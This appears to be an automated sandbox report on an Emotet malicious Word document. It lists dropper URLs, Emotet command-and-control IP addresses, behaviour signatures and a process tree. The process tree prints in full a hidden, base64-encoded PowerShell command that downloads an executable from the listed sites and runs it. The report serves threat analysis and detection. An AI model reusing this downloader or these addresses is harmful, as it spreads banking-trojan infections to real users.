Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    141s
  • resource
    win7v191014
  • submitted
    19-12-2019 23:54

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_5fac5a99c133685dfa34c3192e27fa7b.17

  • Sample

    191219-qvhexwqmln

  • SHA256

    d394ed6a30ff8bd2c2812675561d9662c72ea9d8c987dd329046f0ecfdeb9177

Score
10/10
trojanbankeremotetevasionspyware

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://laclinika.com/wp-admin/r42ar70/
exe.dropper

https://thechasermart.com/wp-admin/7u93/
exe.dropper

https://zamusicport.com/wp-content/Vmc/
exe.dropper

https://zaloshop.net/wp-admin/8j0827/
exe.dropper

https://www.leatherbyd.com/PHPMailer-master/q91l5u01353/

Extracted

Family

emotet

C2

68.187.160.28:443

97.120.32.227:80

187.188.166.192:8080

144.217.117.207:8080

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

68.174.15.223:80

63.246.252.234:80

93.148.252.90:80

74.59.187.94:80

185.160.212.3:80

46.28.111.142:7080

183.99.239.141:80

68.129.203.162:443

144.139.56.105:80

191.183.21.190:80

81.157.234.90:8080

138.68.106.4:7080

203.130.0.69:80
rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Modifies registry class 144 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Drops file in System32 directory 6 IoCs
  • Modifies system certificate store 2 TTPs 1 IoCs
    evasionspywaretrojan

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_5fac5a99c133685dfa34c3192e27fa7b.17.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Drops file in System32 directory
    PID:1124
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000610;000000000000065C;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1360
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000610;000000000000065C;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:836
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABTAHEAbgB1AHAAcwB1AHkAPQAnAEsAbABsAG0AaQByAGsAZwBhAGMAYwAnADsAJABIAHQAdABlAGYAZQBtAHIAawB5AGEAcAB3ACAAPQAgACcANgAzADcAJwA7ACQAVABiAGgAeABuAHMAbwBoAG0AYgBmAGoAPQAnAFUAZgBtAHUAbgBvAHUAdABiAGUAYwBoACcAOwAkAE8AeQBpAGwAcwBlAGUAYwBmAHgAegBjAG4APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAdAB0AGUAZgBlAG0AcgBrAHkAYQBwAHcAKwAnAC4AZQB4AGUAJwA7ACQAVwBuAGIAYgBnAHQAYQBuAGwAPQAnAE4AYgBkAHoAagBoAHoAYgBzAGwAJwA7ACQASwBkAHMAegB1AHMAZABiAHMAcwB4AD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABuAGUAdAAuAFcAZQBCAGMAbABpAGUAbgBUADsAJABaAGEAYwBmAGwAdABkAHIAYwBrAHoAdQA9ACcAaAB0AHQAcABzADoALwAvAGwAYQBjAGwAaQBuAGkAawBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwByADQAMgBhAHIANwAwAC8AKgBoAHQAdABwAHMAOgAvAC8AdABoAGUAYwBoAGEAcwBlAHIAbQBhAHIAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANwB1ADkAMwAvACoAaAB0AHQAcABzADoALwAvAHoAYQBtAHUAcwBpAGMAcABvAHIAdAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAbQBjAC8AKgBoAHQAdABwAHMAOgAvAC8AegBhAGwAbwBzAGgAbwBwAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwA4AGoAMAA4ADIANwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbABlAGEAdABoAGUAcgBiAHkAZAAuAGMAbwBtAC8AUABIAFAATQBhAGkAbABlAHIALQBtAGEAcwB0AGUAcgAvAHEAOQAxAGwANQB1ADAAMQAzADUAMwAvACcALgAiAHMAcABgAGwAaQB0ACIAKAAnACoAJwApADsAJABIAGQAdgB6AGEAYQBjAHYAZwBjAGcAPQAnAEEAZABjAHcAcgBoAHQAcABqAHoAbQBxAHUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFEAawBpAHUAeAByAHkAagB3AGsAbwAgAGkAbgAgACQAWgBhAGMAZgBsAHQAZAByAGMAawB6AHUAKQB7AHQAcgB5AHsAJABLAGQAcwB6AHUAcwBkAGIAcwBzAHgALgAiAGQATwB3AE4ATABPAEEAYABEAGAARgBgAEkATABlACIAKAAkAFEAawBpAHUAeAByAHkAagB3AGsAbwAsACAAJABPAHkAaQBsAHMAZQBlAGMAZgB4AHoAYwBuACkAOwAkAEQAZgB4AHcAYgB4AHQAeQBrAHQAYQBtAGoAPQAnAEsAdQBzAGEAagBkAHcAZQBhACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATwB5AGkAbABzAGUAZQBjAGYAeAB6AGMAbgApAC4AIgBsAGAARQBuAGAARwBUAEgAIgAgAC0AZwBlACAAMgAzADUAMQAyACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABgAEEAUgB0ACIAKAAkAE8AeQBpAGwAcwBlAGUAYwBmAHgAegBjAG4AKQA7ACQAWQBkAGkAaQBnAGoAZgBzAD0AJwBLAGkAYQBoAGYAcwBkAHEAdQAnADsAYgByAGUAYQBrADsAJABEAHAAcwB5AHQAaAB0AGcAYgB3AHIAPQAnAFUAdgBiAGsAdQBjAGQAaQBmAGYAawBqAHoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABiAGoAagByAG0AdQBuAHEAawBtAGIAbQA9ACcASQBzAGkAZABtAGsAcQBzAHcAcgBnAGUAeQAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1324
    • C:\Users\Admin\637.exe
      "C:\Users\Admin\637.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:2204
      • C:\Users\Admin\637.exe
        --3b63a358
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        PID:2232
  • C:\Windows\SysWOW64\iplksensor.exe
    "C:\Windows\SysWOW64\iplksensor.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:2352
    • C:\Windows\SysWOW64\iplksensor.exe
      --b5ebe352
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Drops file in System32 directory
      PID:2372

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1124-3-0x0000000009870000-0x0000000009874000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1124-2-0x000000000656A000-0x000000000656E000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1124-1-0x000000000656A000-0x000000000656E000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1124-0-0x0000000006360000-0x0000000006364000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2204-9-0x0000000000270000-0x0000000000287000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2232-13-0x0000000000370000-0x0000000000387000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2232-14-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2352-16-0x00000000003C0000-0x00000000003D7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2372-18-0x00000000003E0000-0x00000000003F7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2372-19-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download